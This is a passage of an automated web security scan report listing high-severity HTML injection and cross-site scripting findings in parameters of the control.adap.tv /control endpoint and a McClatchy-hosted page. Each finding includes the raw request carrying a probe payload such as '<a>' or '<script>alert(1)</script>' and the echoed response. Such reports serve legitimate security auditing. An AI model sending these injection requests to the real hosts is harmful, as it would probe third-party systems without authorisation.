Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDI2MzNyMASzlMmww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:59 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4622


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb" type="text/css">
...[SNIP]...

5.34. http://control.adap.tv/control [as parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 6d469<a>6b210401782 was submitted in the as parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=36d469<a>6b210401782&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A23";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:23 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32692

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=36d469<a>6b210401782&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.35. http://control.adap.tv/control [categories parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the categories request parameter is copied into the HTML document as plain text between tags. The payload 597f8<a>730fc69c430 was submitted in the categories parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports597f8<a>730fc69c430&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A28";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:28 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33178

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports597f8<a>730fc69c430&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=2
...[SNIP]...

5.36. http://control.adap.tv/control [context parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the context request parameter is copied into the HTML document as plain text between tags. The payload f7644<a>8e21016e644 was submitted in the context parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1f7644<a>8e21016e644&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A16";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:16 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33245

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1f7644<a>8e21016e644&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneri
...[SNIP]...

5.37. http://control.adap.tv/control [eov parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the eov request parameter is copied into the HTML document as plain text between tags. The payload 9ebae<a>8b7b7f1e2c8 was submitted in the eov parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv7759ebae<a>8b7b7f1e2c8 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A53";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:53 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32405

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv7759ebae<a>8b7b7f1e2c8]]>
...[SNIP]...

5.38. http://control.adap.tv/control [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 885f8<a>99d83319bdd was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225885f8<a>99d83319bdd&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A11";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:11 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33243

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225885f8<a>99d83319bdd&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv77
...[SNIP]...

5.39. http://control.adap.tv/control [htmlEnabled parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the htmlEnabled request parameter is copied into the HTML document as plain text between tags. The payload ac2c6<a>db6131604d1 was submitted in the htmlEnabled parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=trueac2c6<a>db6131604d1&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A40";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:40 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32448

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=trueac2c6<a>db6131604d1&eov=cuv775]]>
...[SNIP]...

5.40. http://control.adap.tv/control [isTop parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the isTop request parameter is copied into the HTML document as plain text between tags. The payload cd78a<a>0be71434d95 was submitted in the isTop parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=truecd78a<a>0be71434d95&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A00";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:00 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32466

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=truecd78a<a>0be71434d95&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=tru
...[SNIP]...

5.41. http://control.adap.tv/control [keywords parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload fa8ef<a>1955b0f7885 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascarfa8ef<a>1955b0f7885&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A48";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:48 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32428

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascarfa8ef<a>1955b0f7885&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.42. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bd66c<a>6facc3e4125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775&bd66c<a>6facc3e4125=1 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A11%3A17";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:11:17 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32474

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
s=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775&bd66c<a>6facc3e4125=1]]>
...[SNIP]...

5.43. http://control.adap.tv/control [pageUrl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the pageUrl request parameter is copied into the HTML document as plain text between tags. The payload 8fd77<a>1cad7395e5e was submitted in the pageUrl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html8fd77<a>1cad7395e5e&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A08";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:08 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32524

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
ories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html8fd77<a>1cad7395e5e&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.44. http://control.adap.tv/control [sessionId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the sessionId request parameter is copied into the HTML document as plain text between tags. The payload f2beb<a>113bbd59c6a was submitted in the sessionId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9f2beb<a>113bbd59c6a&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
